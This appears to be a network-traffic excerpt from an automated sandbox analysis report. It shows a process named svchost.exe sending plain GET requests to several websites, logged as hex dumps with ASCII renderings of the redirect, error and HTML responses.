                                                                                                                                                                                                                                                                    2023-07-27 19:44:40 UTC1INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                    2023-07-27 19:44:40 UTC1INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                    1192.168.2.45032191.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2023-07-27 19:44:40 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                    Accept: *
                                                                                                                                                                                                                                                                    Accept-Language: en-us
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                    Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                    2023-07-27 19:44:40 UTC1INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                    Date: Thu, 27 Jul 2023 19:46:31 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                    2023-07-27 19:44:40 UTC1INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                    Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                    2023-07-27 19:44:41 UTC17INData Raw: 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f 6e 74 0d 0a 32 30 30 30 0d 0a 65 6e 74 20 20 2d 2d 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 0d 0a 20 20 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20
                                                                                                                                                                                                                                                                    Data Ascii: </div> </div> </article> </section> </section></div>... topnews. -->... cont2000ent --><div id="content"> ... content-left --> <article id="wtxt" class="mainLeft"> ...
                                                                                                                                                                                                                                                                    2023-07-27 19:44:41 UTC33INData Raw: 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20 68 65 69 67 68 74 3a 38 35 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 33 39 36 31 2c 64 6f 70 61 6c 61 63 0d 0a 31 30 30 30 0d 0a 7a 65 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 64 6f 70 61 6c 61 63 7a 65 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 33 39 36 31 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61
                                                                                                                                                                                                                                                                    Data Ascii: aria-hidden="true" /></a></div><div class="item" style="width:300px; height:85px;margin-bottom:10px"><a href="/w20/batony/3961,dopalac1000ze.html" target="_blank" aria-label="dopalacze"><img src="/dokumenty/batony/3961.jpg?v=1657112618" a
                                                                                                                                                                                                                                                                    2023-07-27 19:44:41 UTC49INData Raw: 63 6a 61 50 4c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 74 69 74 6c 65 3d 22 4f 64 77 69 65 64 c5 ba 20 6e 61 73 20 6e 61 20 59 6f 75 54 75 62 65 22 20 63 6c 61 73 73 3d 22 79 74 22 3e 4f 64 77 69 65 64 c5 ba 20 6e 61 73 20 6e 61 20 59 6f 75 54 75 62 65 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 57 69 65 6c 6b 6f 70 6f 6c 73 6b 61 2d 50 6f 0d 0a 37 34 32 0d 0a 6c 69 63 6a 61 2d 34 39 30 31 39 36 36 30 34 34 37 30 33 34 32 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 74 69 74 6c 65 3d 22 4f 64 77 69 65 64 c5 ba 20 6e 61 73 20 6e 61 20 46 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73
                                                                                                                                                                                                                                                                    Data Ascii: cjaPL" target="_blank" title="Odwied nas na YouTube" class="yt">Odwied nas na YouTube</a></li> <li><a href="https://www.facebook.com/Wielkopolska-Po742licja-490196604470342/" target="_blank" title="Odwied nas na Facebook" clas


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                    2192.168.2.450331172.67.156.49443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2023-07-27 19:44:40 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                    Accept: *
                                                                                                                                                                                                                                                                    Accept-Language: en-us
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                    Host: orlyhotel.com
                                                                                                                                                                                                                                                                    2023-07-27 19:44:41 UTC51INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                    Date: Thu, 27 Jul 2023 19:44:41 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                    Expires: Thu, 27 Jul 2023 19:32:27 GMT
                                                                                                                                                                                                                                                                    Content-Language: en
                                                                                                                                                                                                                                                                    Last-Modified: Thu, 27 Jul 2023 19:32:27 GMT
                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                    Vary: Accept-Language
                                                                                                                                                                                                                                                                    Set-Cookie: django_language=en; expires=Fri, 26-Jul-2024 19:32:27 GMT; Max-Age=31536000; Path=/
                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ibkVtEXZMQy7yamqtgnJhHSYyZBVSyIEojp%2FlV2KJHV593yMzvKaHiMT3S%2Fx9PcRxEwyQrBpSA%2BFFderFSDOK0ldxfgKlHn3qg7qp0GVuJcVYKOIxF2z%2BNNxUQ4vicH8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    CF-RAY: 7ed760df5f6bbbf8-FRA
                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                    2023-07-27 19:44:41 UTC52INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                    2023-07-27 19:44:41 UTC52INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                    3192.168.2.45030249.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2023-07-27 19:44:41 UTC17OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                    Accept: *
                                                                                                                                                                                                                                                                    Accept-Language: en-us
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                    Host: nts-web.net
                                                                                                                                                                                                                                                                    2023-07-27 19:44:41 UTC52INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                    Date: Thu, 27 Jul 2023 19:44:41 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                    Content-Length: 2599149
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Last-Modified: Tue, 08 Nov 2022 00:53:41 GMT
                                                                                                                                                                                                                                                                    ETag: "27a8ed-5eceaf89b8f40"
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    2023-07-27 19:44:41 UTC52INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 77 65 62 73 69 74 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 77 65 62 73 69 74 65 23 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
                                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="ja"> <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# website: http://ogp.me/ns/website#"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="wi
                                                                                                                                                                                                                                                                    2023-07-27 19:44:41 UTC68INData Raw: 77 69 64 74 68 3a 31 2e 30 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 32 2c 2e 63 6c 73 2d 31 36 33 7b 66 69 6c 6c 3a 23 39 32 64 31 64 37 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 35 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 39 37 70 78 3b 7d 2e 63 6c 73 2d 31 36 32 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 31 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 33 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 32 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 34 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 35 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 35 7b 66 69 6c 6c 3a 23 65 65 65 39 34 32 3b 7d 2e 63 6c 73 2d 31 36 36 7b 66 69 6c 6c 3a 23 65 34 38 32 37 65 3b 7d 2e 63 6c 73 2d 31 36 37 7b 66 69 6c 6c 3a 23 38 36 63 64 64 34 3b 7d 2e 63
                                                                                                                                                                                                                                                                    Data Ascii: width:1.04px;}.cls-161,.cls-162,.cls-163{fill:#92d1d7;}.cls-161,.cls-165{stroke-width:0.97px;}.cls-162{stroke-width:1.15px;}.cls-163{stroke-width:1.25px;}.cls-164{stroke-width:1.54px;}.cls-165{fill:#eee942;}.cls-166{fill:#e4827e;}.cls-167{fill:#86cdd4;}.c
                                                                                                                                                                                                                                                                    2023-07-27 19:44:41 UTC84INData Raw: 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 38 33 2c 31 39 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f
                                                                                                                                                                                                                                                                    Data Ascii: 2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M692.83,195a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/
                                                                                                                                                                                                                                                                    2023-07-27 19:44:41 UTC100INData Raw: 22 4d 37 32 33 2e 35 39 2c 32 37 30 2e 33 34 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 32 36 33 2e 34 31 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e
                                                                                                                                                                                                                                                                    Data Ascii: "M723.59,270.34a1.73,1.73,0,0,1-.78,2.24,2.53,2.53,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M723.35,263.41a1.71,1.71,0,0,1-.77,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.51-2.88,2.
                                                                                                                                                                                                                                                                    2023-07-27 19:44:41 UTC116INData Raw: 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 34 2e 31 31 2c 33 33 38 2e 37 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 37 35 30 2c 33 34 30 61 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 38 38 2c 33 33 31 2e 37 39 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                                                                                                                    Data Ascii: s="cls-4" d="M754.11,338.72a1.72,1.72,0,0,1-.78,2.24A2.51,2.51,0,0,1,750,340a2.39,2.39,0,0,1,.51-2.89,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M753.88,331.79a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.4,2.4,0,0,1,.
                                                                                                                                                                                                                                                                    2023-07-27 19:44:41 UTC132INData Raw: 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 31 2c 32 31 33 2e 32 31 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 37 39 2c 32 30 36 2e 32 37 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32
                                                                                                                                                                                                                                                                    Data Ascii: .86"/><path class="cls-4" d="M771,213.21a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.33-.94,2.39,2.39,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M770.79,206.27a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC148INData Raw: 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 35 35 2c 32 38 31 2e 35 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 33 31 2c 32 37 34 2e 36 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e
                                                                                                                                                                                                                                                                    Data Ascii: ,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M801.55,281.59a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M801.31,274.66a1.72,1.72,0,0,1-.78,2.23,2.52,2.
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC164INData Raw: 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 32 2e 30 37 2c 33 35 30 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 31 2e 38 34 2c 33 34 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e
                                                                                                                                                                                                                                                                    Data Ascii: 5,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M832.07,350a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M831.84,343a1.72,1.72,0,0,1-.78,2.
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC180INData Raw: 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 39 2c 32 32 34 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 38 2e 37
                                                                                                                                                                                                                                                                    Data Ascii: 41,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"/><path class="cls-4" d="M849,224.45a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.41,2.41,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M848.7
